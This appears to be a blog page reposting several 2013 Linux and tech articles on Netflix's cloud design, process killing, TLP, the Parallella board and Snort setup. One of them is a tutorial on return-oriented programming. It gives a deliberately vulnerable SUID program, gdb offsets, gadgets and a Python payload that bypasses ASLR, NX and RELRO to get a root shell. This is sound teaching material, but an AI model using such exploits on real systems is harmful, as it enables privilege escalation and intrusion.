Wednesday, April 24, 2013

How Netflix Works

http://www.zdnet.com/the-biggest-cloud-app-of-all-netflix-7000014298


Netflix, the popular video-streaming service that takes up a third of all internet traffic during peak traffic hours isn't just the single largest internet traffic service. Netflix, without doubt, is also the largest pure cloud service.
netflixcloud-620x457
Netflix, with more than a billion video delivery instances per month, is the largest cloud application in the world.
At the Linux Foundation's Linux Collaboration Summit in San Francisco, California, Adrian Cockcroft, director of architecture for Netflix's cloud systems team, after first thanking everyone "for building the internet so we can fill it with movies", said that Netflix's Linux, FreeBSD, and open-source based services are "cloud native".
By this, Cockcroft meant that even with more than a billion video instances delivered every month over the internet, "there is no datacenter behind Netflix". Instead, Netflix, which has been using Amazon Web Services since 2009 for some of its services, moved its entire technology infrastructure to AWS in November 2012.
Specifically, depending on customer demand, Netflix's front-end services are running on 500 to 1,000 Linux-based Tomcat JavaServer and NGINX web servers. These are empowered by hundreds of other Amazon Simple Storage Service (S3) and the NoSQL Cassandra database servers using the Memcached high-performance, distributed memory object caching system. All of this, and more besides, are distributed across three Amazon Web Services availability zones. Every time you visit Netflix either with a device or a web browser, all these are brought together within a second to show you your video selections.
According to Cockcroft, if something goes wrong, Netflix can continue to run the entire service on two out of three zones. Netcraft didn't simply take Amazon's word for this. They tested out total Amazon Elastic Compute Cloud (EC2) failures with its open-source Chaos Gorilla software. "We go around trying to break things to prove everything is resistant to it," said Cockcroft. Netflix, in concert with Amazon, is working on multi EC2 region availability. Once in place, an entire EC2 zone failure won't stop Netflix videos from flowing to customers.
That won't be easy though. It's not so much that the problem is replicating videos and services across the EC2 zones. Netflix already has its own content delivery network (CDN), Open Connect, and servers placed at local ISP hubs for that. No, the real problem is setting the Domain Name System (DNS) so that users are directed to the right Amazon zone when one is down. That's because Cockcroft said, DNS provider wildly different application programming interfaces (API)s, and they're designed to be hand-managed by an engineer and thus are not at all easy to automate.
That isn't stopping Netflix from addressing the problem just because it's difficult. Indeed, Netflix plans on failure. As Cockcroft titled his talk, Netflix is about dystopia as a service. The plan isn't if something will fail on the cloud, it's on how to keep working no matter how the clouds or specific services fail. Netflix's services are designed to, when something go wrong, gradually degrade rather than fail completely.
As he said, sure, perfection, utopia would be great, but if you're always striving for perfection, you always end up compromising. So instead of striving for perfection, Netflix is continuously updating its systems in real time rather than perfecting them. How fast is that? Netflix wants to "code features in days instead of months; we want to deploy new hardware in minutes instead of weeks; and we want to see instant responses in seconds instead of hours". By deploying on the cloud, Netflix can do all of this.
Sure, sometimes, this doesn't work. In December 2012, for example, a failure in AWS's Elastic Load Balancer in the US-East-Region1 datacenter brought Netflix down during the Christmas holiday.
On the other hand, the Netflix method of producing code sooner rather than later, and running in such a way that the service keeps going even though some components are — not may, but are — broken and inefficient at any given time, has produced a service that is capable of being the single largest consumer of internet bandwidth. Clearly, it's not perfect, but Netflix's design decision to "create a highly agile and highly available service from ephemeral and often broken components" on the cloud works, and as far as Netflix is concerned, for day to day cloud-based video delivery, that's much better than "perfection" could ever be.
Related stories

An Introduction to Returned-Oriented Programming (Linux)

http://resources.infosecinstitute.com/an-introduction-to-returned-oriented-programming-linux


INTRODUCTION:
In 1988, the first buffer overflow was exploited to compromise many systems. After 20 years, applications are still vulnerable, despite the efforts made in hope to reduce their vulnerability.
In the past, the most complex priority was discovering bugs, and nobody cared about writing exploits because it was so easy. Nowadays, exploiting buffer overflows is also difficult because of advanced defensive technologies.
Some strategies are adopted in combination to make exploit development more difficult than ever like ASLR, Non-executable memory sections, etc.
In this tutorial, we will describe how to defeat or bypass ASLR, NX, ASCII ARMOR, SSP and RELRO protection in the same time and in a single attempt using a technique called Returned Oriented Programming.
Let’s begin with some basic/old definitions:
→ NX: non-executable memory section (stack, heap), which prevent the execution of an arbitrary code. This protection was easy to defeat it if we make a correct ret2libc and also borrowed chunk techniques.
→ ASLR: Address Space Layout Randomization that randomizes a section of memory (stack, heap and shared objects). This technique is bypassed by brute forcing the return address.
→ ASCII ARMOR: maps libc addresses starting with a NULL byte. This technique is used to prevent ret2lib attacks, hardening the binary.
→ RELRO: another exploit mitigation technique to harden ELF binaries. It has two modes:
  • Partial Relro: reordering ELF sections (.got, .dtors and .ctors will precede .data/.bss section) and make GOT much safer. But PLT GOT still writable, and the attacker still overwrites it.
Non-PLT GOT is read-only.
Compile command: gcc -Wl,-z,relro -o bin file.c
  • Full Relro: GOT is remapped as READ-ONLY, and it supports all Partial RELRO features.
Compiler command: gcc -Wl,-z,relro,-z,now -o bin file.c

→ SSP: Stack Smashing Protection:
Our Exploit will bypass all those mitigations, and make a reliable exploit.
So let’s go
OVERVIEW OF THE CODE:

Here is the vulnerable code. The binary and code are included in the last of tutorial.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#include
#include
#include
#include <sys/types.h>
#include <sys/stat.h>
#include
#include
void fill(int,int,int*);
int main(int argc,char** argv)
{
FILE* fd;
int in1,in2;
int arr[2048];
char var[20];
if (argc !=2){
printf("usage : %s n",*argv);
exit(-1);
}
fd = fopen(argv[1],"r");
if(fd == NULL)
{
fprintf(stderr,"%sn",strerror(errno));
exit(-2);
}
memset(var,0,sizeof(var));
memset(arr,0,2048*sizeof(int));
while(fgets(var,20,fd))
{
in1 = atoll(var);
fgets(var,20,fd);
in2 = atoll(var);
/* fill array */
fill(in1,in2,arr);
}
}
void fill(int of,int val,int *tab)
{
tab[of]=val;
}
First thing let’s explain what the code does.
It opens a filename, reads from it line by line and holds in1 as an offset of table and in2 as a value of this offset then it calls fill function to fill the array.
tab[in1]=in2 ;
So a buffer overflow occurred when in1 is the offset of return address, this we can write whatever there.
Let’s compile the vulnerable code:
1
2
3
gcc -o vuln2 vuln2.c -fstack-protector -Wl,-z,relro,-z,now
chown root:root vuln2
chmod +s vuln2
And we check the resulting binary using checksec.sh
1
2
3
4
user@protostar:~/course$ checksec.sh --file vuln2
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Full RELRO Canary found NX enabled No PIE No RPATH No RUNPATH vuln2
user@protostar:~/course$
So the binary is hardened, but motivated attackers still succeed in their intent.
As we can see we can overwrite EIP directly, and if we assume that we can do that, the SSP does some checks to see if the return address has changed, if yes then our exploit will fail.
OWNING EIP:

Let’s open the binary with gdb and disassemble the main function:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
gdb$ disas main
Dump of assembler code for function main:
0x08048624
+0>: push ebp
...
0x08048754
+304>: mov DWORD PTR [esp+0x202c],eax
0x0804875b
+311>: lea eax,[esp+0x2c]
0x0804875f
+315>: mov DWORD PTR [esp+0x8],eax
0x08048763
+319>: mov eax,DWORD PTR [esp+0x202c]
0x0804876a
+326>: mov DWORD PTR [esp+0x4],eax
0x0804876e
+330>: mov eax,DWORD PTR [esp+0x2030]
0x08048775
+337>: mov DWORD PTR [esp],eax
0x08048778
+340>: call 0x80487be
0x0804877d
+345>: mov eax,DWORD PTR [esp+0x2034]
0x08048784
+352>: mov DWORD PTR [esp+0x8],eax
...

Let’s create a simple file named ‘simo.txt’ and put the following:
1
2
1
10
We make some breakpoints:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
gdb$ b *main
Breakpoint 1 at 0x8048624
gdb$ b *0x08048778
Breakpoint 2 at 0x8048778
gdb$ run file
Breakpoint 1, 0x08048624 in main ()
gdb$ x/x $esp
0xbffff7cc:    0xb7eabc76
gdb$ continue
Breakpoint 2, 0x08048778 in main ()
gdb$ x/4x $esp
0xbfffd770:    0x00000001    0x0000000a    0xbfffd79c    0x00000000
gdb$ x/i 0x08048778
0x8048778 <main+340>:    call 0x80487be
gdb$
In the first bpoints we see the return address
0xbffff7dc: is main return address
0xbfffd79c : the address of arr
If you’re familiar with stack frame, you’ll notice that we made a call: fill(1,10,arr)
then it does the following : arr[1]=10 ;
A clever hacker will notice that the offset between the address of arr and return address is 8240
(0xbffff7cc-0xbfffd79c = 8240) and because we are playing with integer values, then we must divide the result by 4 ( sizeof(int)) .so, 8240/4=2060.
So if we put an offset equal to 2060 we can write to EIP, let’s check:
Put the following in simo.txt:
1
2
2060
1094861636
The result is:
1
2
3
4
5
6
7
8
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 00000000 EBX: B7FD5FF4 ECX: B7FDF000 EDX: 00000000 o d I t s Z a P c
ESI: 00000000 EDI: 00000000 EBP: BFFFF848 ESP: BFFFF7D0 EIP: 41424344
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
Cannot access memory at address 0x41424344
0x41424344 in ?? ()
gdb$
So we are successfully own EIP and bypassed Stack Smashing Protection.
Let’s build our exploit now.
BUILDING THE EXPLOIT:
Our aim now is to build a chained ROP to execute execve(). As we can see, we don’t have a GOT entry for this function and libc is randomized.
So what we will do first is to leak a libc function address for GOT then we will do some trivial calculation to get the exact execve libc address.
And remember that we cannot overwrite GOT because of « Full Relro » .
1
2
3
4
5
6
7
8
9
10
11
12
13
readelf -r vuln2
08049fcc 00000107 R_386_JUMP_SLOT 00000000 __errno_location
08049fd0 00000207 R_386_JUMP_SLOT 00000000 strerror
08049fd4 00000307 R_386_JUMP_SLOT 00000000 __gmon_start__
08049fd8 00000407 R_386_JUMP_SLOT 00000000 fgets
08049fdc 00000507 R_386_JUMP_SLOT 00000000 memset
08049fe0 00000607 R_386_JUMP_SLOT 00000000 __libc_start_main
08049fe4 00000707 R_386_JUMP_SLOT 00000000 atoll
08049fe8 00000807 R_386_JUMP_SLOT 00000000 fopen
08049fec 00000907 R_386_JUMP_SLOT 00000000 printf
08049ff0 00000a07 R_386_JUMP_SLOT 00000000 fprintf
08049ff4 00000b07 R_386_JUMP_SLOT 00000000 __stack_chk_fail
08049ff8 00000c07 R_386_JUMP_SLOT 00000000 exit
Let’s leak the address of printf (you can choose any GOT entry)
Want to learn more?? The InfoSec Institute Reverse Engineering course teaches you everything from reverse engineering malware to discovering vulnerabilities in binaries. These skills are required in order to properly secure an organization from today's ever evolving threats. In this 5 day hands-on course, you will gain the necessary binary analysis skills to discover the true nature of any Windows binary. You will learn how to recognize the high level language constructs (such as branching statements, looping functions and network socket code) critical to performing a thorough and professional reverse engineering analysis of a binary. Some features of this course include:

  • CREA Certification
  • 5 days of Intensive Hands-On Labs
  • Hostile Code & Malware analysis, including: Worms, Viruses, Trojans, Rootkits and Bots
  • Binary obfuscation schemes, used by: Hackers, Trojan writers and copy protection algorithms
  • Learn the methodologies, tools, and manual reversing techniques used real world situations in our reversing lab.
1
2
3
4
5
6
7
gdb$ x/x 0x08049fec
0x8049fec <_GLOBAL_OFFSET_TABLE_+44>:    0xb7edbf90
gdb$ p execve
$9 = {} 0xb7f2c170
gdb$ p 0xb7f2c170-0xb7edbf90
$10 = 328160
gdb$
The offset between printf and execve is 328160.
So if we add the address of printf libc to 328160 we get the execve libc address dynamically by leaking the printf address that is loaded in GOT.
1
execve = printf@libc+ 328160
So we must find some ROPs
The next step is finding some useful gadgets to build a chain of instructions. We’ll use ROPEME to do that.
We generate a .ggt file which contains some instructions finished by a ret.
Our purpose is to do some instruction, then return into our controlled code.
1
ROPeMe> generate vuln 6
We need those useful gadgets to build our exploit.
1
2
3
0x804886eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
0x804861fL: call eax ; leave ;;
0x804849cL: pop eax ; pop ebx ; leave ;;
So let’s build our ROP using those gadgets.
Our attack then: load 328160 into EAX, 0x138e9ff4 into EBX. You’ll ask me what is 0x138e9ff4?
Well we have a gadget like this:
1
0x804886eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
ebx-0xb8a0008= printf@got then , ebx = printf@got+ 0xb8a0008 = 0x138e9ff4
So EAX = 328160 and EBX = 0x138e9ff4.
When «add eax [ebx-0xb8a0008]» executed EAX will contain the address of execve dynamically
After that, we make call%eax to execute our command and don’t forget to put the correct parameters on the stack.
There is a small problem which must be resolved. When the leave instruction is executed, it loads the saved return address of the main lead losing our controlled data. The solution is easy; like what we did earlier. Some trivial calculations, and we get the correct saved return address.
1
2
3
4
0x8048778 <main+340>:    call 0x80487be
Breakpoint 1, 0x08048778 in main ()
gdb$ x/4x $esp
0xbfffd770:    0x0000080c    0x0804849c    0xbfffd79c    0x00000000
We continue.
1
2
3
4
0x804849f <_init+47>:    ret
0x0804849f in _init ()
gdb$ x/x $esp
0xbffff84c:    0x0804886e
When «leave » is executed, ESP points to another area that we are not able to control.
Let’s predict where ESP points exactly: as we did earlier, we subtract arr address from ESP and dividing by 4: (0xbffff84c-0xbfffd79c)/4 = 2092
So our payload will look like this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#!/usr/bin/python
r = "n"
p = str(2060) +r # offset of return address
p += str(0x804849c) +r # pop eax ; pop ebx ; leave ;;
p += str(2061) +r
p += str(328160)+r # EAX
p += str(2062)+r
p += str(0x138e9ff4)+r # EBX
p += str(2092) +r
p += str(0x804886e)+r # add eax [ebx-0xb8a0008] ; add esp 0x4
#; pop ebx
p += str(2096) +r
p += str(0x41414141) +r
o = open("simo.txt","wb")
o.write(p)
o.close()
Let’s see what happens:
1
2
3
4
5
6
7
8
9
10
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: B7F2C170 EBX: 00000002 ECX: B7FDF000 EDX: 00000000 o d I t S z a p c
ESI: 00000000 EDI: 00000000 EBP: BFFFF874 ESP: BFFFF860 EIP: 41414141
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007BError while running hook_stop:
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb$ x/x $eax
0xb7f2c170 :    0x8908ec83
gdb$
It works!
So EAX contains the address of execve and we still control EIP. The next step is to find some a printable string and two null values to make parameters for execve.
We search inside the binary using objdump:
1
2
3
4
5
6
7
8
user@protostar:~/course$ objdump -s vuln2 |more
vuln2: file format elf32-i386
Contents of section .interp:
8048134 2f6c6962 2f6c642d 6c696e75 782e736f /lib/ld-linux.so
8048144 2e3200 .2.
Contents of section .note.ABI-tag:
8048148 04000000 10000000 01000000 474e5500 ............GNU.
8048158 00000000 02000000 06000000 12000000 ................
0x0x8048154 points to a printable ASCII: « GNU » and 8048158 points to NULL bytes.
Our exploit is then: execve(0x 8048158, 0×8048154, 0×8048154). But we don’t have GNU as a command, well we will create a wrapper named GNU.c :
1
2
3
4
5
6
7
#include
/* compile : gcc -o GNU GNU.c
int main()
{
char *args[]={"/bin/sh",NULL};
execve(args[0],args,NULL);
}
Then add path where GNU is located to $PATH variable environment :
export PATH=/yourpath/:$PATH
Our final exploit :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/usr/bin/python
r = "n"
p = str(2060) +r # offset of return address
p += str(0x804849c) +r # pop eax ; pop ebx ; leave ;;
p += str(2061) +r
p += str(328160)+r # offset between printf and execve
p += str(2062)+r
p += str(0x138e9ff4)+r # printf@got + 0xb8a0008
p += str(2092) +r
p += str(0x804886e)+r # add eax [ebx-0xb8a0008] ; add esp 0x4
#; pop ebx
p += str(2096) +r
p += str(0x804861f) +r #: call eax ; leave ;;
p += str(2097) +r
p += str(0x8048154) +r # "GNU"
p += str(2098)+r
p += str(0x8048158) +r # pointer to NULL
p += str(2099)+r
p += str(0x8049fb0) +r # pointer to NULL
o = open("simo.txt","wb")
o.write(p)
o.close()
let’s run our attack :
1
2
3
4
5
user@protostar:~/course$ python exploit.py
user@protostar:~/course$ ./vuln2 simo.txt
# whoami
root
#
It works, so we successfully got the shell with SUID privileges, and we bypassed all exploit mitigations in one attempt .
If you opened the binary with gdb you’ll notice that the addresses changed during the execution of process, and our exploit is still reliable and resolves execve reliably.
Conclusion:
We presented a new attack against programs vulnerable to stack overflows to bypass two of the most widely used protections (NX & ASLR) including some others (Full RELRO,ASCII ARMOR, SSP) .
With our exploit, we extracted the address space from vulnerable process information about random addresses of some libc functions to mount a classical ret2libc attack.
References :

PAYLOAD ALREADY INSIDE: DATA REUSE FOR ROP

EXPLOITS
http://force.vnsecurity.net/download/longld/BHUS10_Paper_Payload_already_inside_data_reuse_for_ROP_exploits.pdf

Surgically returning to randomized lib(c)
http://security.dico.unimi.it/~gianz/pubs/acsac09.pdf

Mastering the Linux Shell : Killing Processes and Dire Warnings

http://marcelgagne.com/content/mastering-linux-shell-killing-processes-and-dire-warnings


Today's installment of Mastering the Linux Shell comes with a warning. Actually, it comes with a few warnings. .And a viewer advisory. Well, actually a reader advisory.
You see, some of what I cover sounds pretty violent and discretion is advised. I'll be talking about processes and their children, and the need, at times to kill a process. You may even have to kill child processes so this is not for the squeamish. If it makes you feel any better, these processes are just code running somewhere in memory. It's not like Tron at all. They're just bits of information and when you power off your machine, they die anyway. I should point out that many long time Linux users never power their down their machines. Most people think it's because you really don't need to shut down or reboot Linux systems all that often. For some, however, it's because they can't bear to kill processes.
Enough silliness. On to the serious stuff.

Killing Processes

When we talk about killing a process, the common understanding is that you end the process. The program is closed and no longer running. That can be one way you kill processes, but there's more to it than that. You can usually interrupt a foreground process with the Control-C sequence but that does not work with background processes.  The command used to terminate a process is called kill, which as it turns out, is an unfortunate name for a command which does more than just terminate processes.   By design, kill sends signals to jobs.   That signal is sent as an option (after a hyphen) to a process ID. The process ID can be found using the ps command as I demonstrated in an earlier article.
kill –signal_no PID
For instance, I can send the SIGHUP signal to process 7612 like this.
kill –1 7612
Signals are messages.  They are usually referenced numerically, as with the ever popular “kill –9” signal, but there are a number of others.  The ones you are most likely to use are 1, 9, and 15.   These signals can also be referenced symbolically with these names.
Signal 1 is SIGHUP.   This is normally used with system processes such as inetd and other daemons.   With these types of processes, a SIGHUP tells the process to hang up, reread its configuration files, and restart.  Most applications will just ignore this signal.
Signal 9 is SIGKILL, an unconditional termination of the process.  Some admins I've known call this “killing with extreme prejudice”.  The process is not asked to stop, close its files, and terminate gracefully.  It is simply killed.  This should be your last resort approach to killing a process and works 99% of the time.   Only a small handful of conditions will ever ignore the -9 signal.
Signal 15, the default, is SIGTERM, a call for normal program termination.  The system is asking the program to wrap it up and stop doing whatever it was doing.
Remember when we suspended a process earlier using Control-Z?  That was another signal.  Try this to get a feel of how this works.  If you are running in an X display, start a digital xclock with a seconds display updated every second.
xclock -digital -update 1 &

You should see the second digits counting away.   Now, find its process ID with “ps ax | grep xclock”.   We’ll pretend the process ID is 12136.  Let’s kill that process with a “SIGSTOP”. 
kill SIGSTOP 12136
The digits have stopped incrementing, right?  Here's a cool trick. Try closing the window for the xclock by clicking on the x in the corner. It doesn't work, does it? I'll let you think about that one. For now, let’s restart the xclock.
kill SIGCONT 12136
As you can see, kill is probably a bad name for a command that can suspend a process, then bring it back to life.  For a complete list of signals and what they do, look in the man pages with this command.
man 7 signal
If you wanted to kill a process by specifying the symbolic signal, you would use the signal name minus the SIG prefix.  For instance, to send the -1 signal to cupsd, I could do this instead.
kill -HUP `pidof cupsd`
Note that these are back-quotes around the command string aboveThe pidof command does exactly what you think; it returns the PID of the cupsd daemon.

Dire Warnings

Since I've gone told you about terminating processes, it seems fitting that I revisit another, much earlier topic, where I discussed deleting files.  When killing processes, you want to be very careful. Some processes, when terminated, will terminate your entire desktop session, your network connection, or the entire running machine. Look for the process you need to terminate, then act accordingly. When operating as the superuser (i.e. the 'root' user), you can do anything and the system naturally assumes you know what you are doing. It's true when dealing with processes and it's true when deleting files.
I've used the explanation that everything on your Linux system is a file, but then I also said that there were different types of files.  In order to work with directory files, we have the following batch of commands which are ideally suited to this.
pwd (Print Working Directory)
cd (Change to a new Directory)
mkdir (MaKe or create a new DIRectory)
mv (MoVe directories, or like files, rename them)
rmdir (ReMove or delete DIRectories.)
One way to create a complicated directory structure is to use the mkdir to create each and every directory.
mkdir /dir1
mkdir /dir1/sub_dir
mkdir /dir1/sub_dir/yetanotherdir
What you could do instead is save yourself a few keystrokes and use the "-p" flag instead.  This tells "mkdir" to create any parent directories that might not already exist.   If you happen to like a lot of verbiage from your system, you could also add the "--verbose" flag for good measure.
mkdir –p /dir/sub_dir/yetanotherdir
To rename or move a directory, the format is the same as you used with a file or group of files.  Use the mv command.
mv path_to_dir new_path_to_dir
Removing a directory can be just a bit more challenging.   The command "rmdir" seems simple enough.  In fact, removing this directory was no problem.
$ rmdir trivia_dir
Removing this one, however, gave me this error.
$ rmdir junk_dir
rmdir: junk_dir: Directory not empty
You can only use rmdir to remove an empty directory.  There is a "-p" option (as in parents) that lets you remove a directory structure.  For instance, you could remove a couple of levels like this.
$ rmdir –p junk_dir/level1/level2/level3
All the directories from junk_dir on down will be removed, but only if they are empty of files. This is where it gets interesting. And dangerous.  The better approach is to use the rm command with the "-r", or recursive option.  Unless you are deleting only a couple of files or directories, you will want to use the "-f" option as well.
$ rm –rf junk_dir

And now, the DIRE WARNING!

Beware the "rm  –rf  *" command!  Better yet.  Never use it.  If you must delete a whole directory structure, change directory to the one above it and explicitly remove the directory.  This is also the first and best reason to do as much of your work as possible as a normal user and not root.  Since root is all powerful, it is quite capable of completely destroying your system.  Imagine that you are in the top level directory ( / ) instead of /home/myname/junkdir when you initiated that recursive delete.  It is far too easy to make this kind of mistake.  Beware.
With that last bit of warning, I leave you until the next instalment. Many thanks to all of you who have followed me in this series. As usual, if you wish to comment, please do so here on Google Plus or over here on Facebook and add me to your circles or friend list if you haven't already done so. Also, make sure you sign up for the mailing list over here so that you're always on top of what you want to be on top of.  Until next time . . .
A votre santé! Bon appétit!

Thursday, April 18, 2013

Improve Power Usage / Battery Life In Linux With TLP

http://www.webupd8.org/2013/04/improve-power-usage-battery-life-in.html


There are various tweaks that you can apply to your laptop to save battery power, but many of them depend on the hardware, Linux distribution, some are outdated or too hard to apply for regular users and so on. TLP is an advanced power management command line tool for Linux that tries to apply these settings / tweaks for you automatically, depending on your Linux distribution and hardware.

Ubuntu laptop


TLP applies the following settings depending on the power source (battery / ac):
  • Kernel laptop mode and dirty buffer timeouts;
  • Processor frequency scaling including "turbo boost" / "turbo core";
  • Power aware process scheduler for multi-core/hyper-threading;
  • Hard disk advanced power management level and spin down timeout (per disk);
  • SATA aggressive link power management (ALPM);
  • PCI Express active state power management (PCIe ASPM) – Linux 2.6.35 and above;
  • Runtime power management for PCI(e) bus devices – Linux 2.6.35 and above;
  • Radeon KMS power management – Linux 2.6.35 and above, not fglrx;
  • Wifi power saving mode – depending on kernel/driver;
  • Power off optical drive in drive bay (on battery).

Additional TLP functions:
  • I/O scheduler (per disk);
  • USB autosuspend with blacklist;
  • Audio power saving mode – hda_intel, ac97;
  • Enable or disable integrated wifi, bluetooth or wwan devices upon system startup and shutdown;
  • Restore radio device state on system startup (from previous shutdown);
  • Radio device wizard: switch radios upon network connect/disconnect and dock/undock;
  • Disable Wake On LAN;
  • WWAN state is restored after suspend/hibernate;
  • Undervolting of Intel processors – requires kernel with PHC-Patch;
  • Battery charge thresholds – ThinkPads only;
  • Recalibrate battery – ThinkPads only.

TLP applies these settings automatically on startup and every time you change the power source. To use it, all you have to do is install TLP, however, there are some settings that you can apply manually, overwriting the TLP default settings, such as enabling or disabling the WiFi, Bluetooth or Wwan (3G or UMTS) radios, switching between AC or battery settings, ignoring the actual power source, apply autosuspend for all attached USB devices or power off the optical drive.

There are also some TinkPad-only settings that you can use, like temporarily changing the battery charge thresholds, temporarily set battery charge thresholds to factory settings, recalibrating the battery and more.

For more about these settings, see the TLP homepage or consult the TLP manpage (type "man tlp" in a terminal).

I've only been using TLP for a couple of hours so I can't say yet how efficient this tool is regarding battery life, but I've noticed that my laptop's temperature is lower than before using TLP. You may have seen an icon on my Unity launcher in some posts on WebUpd8, which displays a number that's usually around 65 - that's Psensor and it displays the CPU temperature (Celsius; it's 165 degrees Fahrenheit) - here's an example. Well, after installing TLP, the CPU temperature didn't go past 55 degrees Celsius (135 degrees Fahrenheit), at least not yet, with regular desktop usage: using a browser with quite a few tabs open, a text editor and a few AppIndicators running, under Unity. This, of course, depends on various factors but so far this tool seems to do its job. Also, some Reddit users have reported that TLP makes quite a big difference.



Install TLP in Ubuntu


Before proceeding with the installation, there are a couple of things you need to do:
  • firstly, if you've added any power saving settings / scripts (e.g.: in /etc/rc.local), remove them or else TLP may not work properly;
  • remove laptop-mode-tools ("sudo apt-get remove laptop-mode-tools").

Ubuntu (and Linux Mint, etc.) users can install TLP by using its official PPA. Add the PPA and install TLP using the following commands:
sudo add-apt-repository ppa:linrunner/tlp
sudo apt-get update
sudo apt-get install tlp tlp-rdw

TLP will automatically start  upon system startup, but to avoid having to restart the system to get it running for the first time, you can start it (required only the first time) using the following command:
sudo tlp start

There are some optional packages you can install for some extra features:
  • smartmontools - needed to display disk drive S.M.A.R.T. data;
  • ethtool - needed to disable wake on lan.

Install these tools (available in the Ubuntu repositories) using the following command:
sudo apt-get install smartmontools ethtool

There are also some ThinkPad only, optional packages you may need:
  • tp-smapi-dkms - needed for battery charge thresholds and ThinkPad specific status output of tlp-stat;
  • acpi-call-tools - acpi-call is needed for battery charge thresholds on Sandy Bridge and newer models (X220/T420, X230/T430, etc.).

Install these packages using the following command:
sudo apt-get install tp-smapi-dkms acpi-call-tools

Other Linux distributions: there are TLP packages for Debian 6.0+, Arch Linux, openSUSE 11.4+, Gentoo, Fedora 16+ - see the TLP homepage for installation instructions. You can grab the source / report bugs @ GitHub

Make sure to also read the TLP FAQ.

Wednesday, April 17, 2013

Parallella: The $99 Linux supercomputer

http://www.zdnet.com/parallella-the-99-linux-supercomputer-7000014036


Chip-company Adapteva announced on April 15th at the Linux Collaboration Summit in San Francisco, California, that they've built their first Parallella parallel-processing board for Linux supercomputing, and that they'll be sending them to their 6,300 Kickstarter supporters and other customers by this summer.
parallella
Say hi to Parallella, the $99 Linux-powered supercomputer. (Image: The Linux Foundation)
Linux has long been the number one supercomputer operating system. But while you could build your own Linux supercomputer using commercial off-the-shelf (COTS) products, it wouldn't be terribly fast. You needed hardware that could support massively parallel computing — the cornerstone of modern supercomputing.
What Adapteva has done is create a credit-card sized parallel-processing board. This comes with a dual-core ARM A9 processor and a 64-core Epiphany Multicore Accelerator chip, along with 1GB of RAM, a microSD card, two USB 2.0 ports, 10/100/1000 Ethernet, and an HDMI connection. If all goes well, by itself, this board should deliver about 90 GFLOPS of performance, or — in terms PC users understand — about the same horse-power as a 45GHz CPU.
This board will use Ubuntu Linux 12.04 for its operating system. To put all this to work, the platform reference design and drivers are now available.
Why would you want a $99 supercomputer?
Well, besides the fact that it would be really cool, Adapteva CEO Andreas Olofsson explained:
Historically, serial processing [conventional computing] improved so quickly that in most applications, there was no need for massively parallel processing. Unfortunately, serial processing performance has now hit a brick wall, and the only practical path to scaling performance in the future is through parallel processing. To make parallel software applications ubiquitous, we will need to make parallel hardware accessible to all programmers, create much more productive parallel programming methods, and convert all serial programmers to parallel programmers.
And of course, Olofsson added, to "make parallel computing accessible to everyone so we can speed up the adoption of parallel processing in the industry", the Parallella had to be created. Olofsson admitted that his company couldn't have done it by itself. The project required, and got, the support of other hardware OEMs, including Xilinx, Analog Devices, Intersil, Micron, Microchip, and Samtec. The companies have enabled Adapteva to bring its first per-production boards to San Francisco, and soon, to its eager programmer customers.

Protect your network with Snort

http://www.linuxuser.co.uk/tutorials/protect-your-network-with-snort


       Whether meaning to be mischievous or malicious, hackers can wreak havoc on your network. Fortunately, Snort makes it easy to spot them and set up protection


Snort is an intrusion detection system (IDS). It works by monitoring network activity and raising an alert in the case of suspicious activity. What constitutes suspicious activity is definable by rules, and it comes with a massive selection. It can protect a single machine from attacks or even an entire network. This guide will show you how to set up and use Snort and also take you through some typical security scenarios in which Snort will prove useful.
As you get to know Snort, you might consider setting up a testing environment using virtual machines. A simple approach would be to use a virtual machine that has its network adaptor configured to be visible on your network (the setting is called ‘bridged adaptor’ in VirtualBox, for example). The techniques outlined here are not dangerous, but they can be considerably easier to get working within a controllable environment.
network sniff
Snort runs on a single machine, but can monitor an entire network

Resources

Snort
The Snort manual
A second network card (optional)

Step by Step

Step 01

Install Snort
Install Snort with ‘sudo apt-get install snort’. If you need the very latest version, visit the website and fetch, build and install it.

Step 02

Set Up a ‘quiet’ network environment
When first setting up Snort, it helps to have as little activity on the network as possible. Disconnect other computers or even set up a VM with a bridged adaptor which you can operate upon from the host machine.

Step 03

Test Snort installation
Nearly all Snort operations need to be carried out by the root user. On Ubuntu, it’s probably worth using ‘sudo -i’ to avoid password prompts. Use ‘su’ on other distros. As root, type ‘snort -v’. This puts Snort into packet sniffer mode.

Step 04

Create network activity
Presuming that the network you are on is reasonably quiet, you can generate some network activity by pinging the server. Open another terminal and type ‘ping [IP address of server]’, and cancel after a couple of successful pings. Now, go back to the terminal with Snort running.

Step 05

Interpreting the data
In this example, the ping activity is reported in entries that end with lines ‘ECHO’ and ‘ECHO REPLY’. You may have to scroll back in the terminal to see these entries. Notice that the entries contain the time that the activity occurred and the source and destination of the traffic.

Step 06

Exiting Snort
Exit Snort by hitting Ctrl+C. When you exit Snort, it prints a statistical summary of the traffic that it observed. In this example, there should have been some ICMP traffic from the ping operation.
network sniffer
Exiting Snort

Step 07

More detail
Here’s a more extensive command line: ‘snort -vde’. This produces more output due to the d (display packet data) and e (application layer). For example, if you fetch POP email without SSL selected, you’ll be able to see the username and password scroll past.

Step 08

log packet data
Make a directory called ‘snort_logs’. Now run ‘snort -d -l ./snort_logs’ and Snort will log all recorded traffic into the log directory with a separate file for each interface. We’ll skip the verbose flag (-v), as all of the screen output eats into Snort’s throughput.

Step 09

Back up Snort configuration file
Snort comes with a default configuration file which we will back up. Type ‘locate snort.conf’ to find the file and then make a copy of it. ‘cp /etc/ snort/snort.conf /etc/snort/snort.conf_old’ should work for Ubuntu, for example.

Step 10

Initial configuration
